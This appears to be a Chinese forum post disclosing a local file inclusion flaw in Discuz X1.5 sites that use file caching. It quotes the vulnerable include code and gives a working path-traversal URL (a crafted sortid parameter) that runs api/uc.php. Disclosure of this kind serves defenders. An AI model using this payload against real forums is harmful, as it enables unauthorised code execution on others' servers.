DISCUZ X1.5 本地文件包含漏洞
<p> DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。</p><p> config_global.php</p>
<p> $_config['cache']['type'] = ‘file’;</p>
<p> function cachedata($cachenames) {</p>
<p> ……</p>
<p> $isfilecache = getglobal(‘config/cache/type’) == ‘file’;</p>
<p> ……</p>
<p> if($isfilecache) {</p>
<p> $lostcaches = array();</p>
<p> foreach($cachenames as $cachename) {</p>
<p> if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {</p>
<p> $lostcaches[] = $cachename;</p>
<p> }</p>
<p> }</p>
<p> ……</p>
<p> }</p>
<p> 地址:</p>
<p> http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc</p>
<p> http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried</p>
<p> 执行了 api/uc.php 页面代码了。</p>
<p> 作者: Jannock</p>
頁:
[1]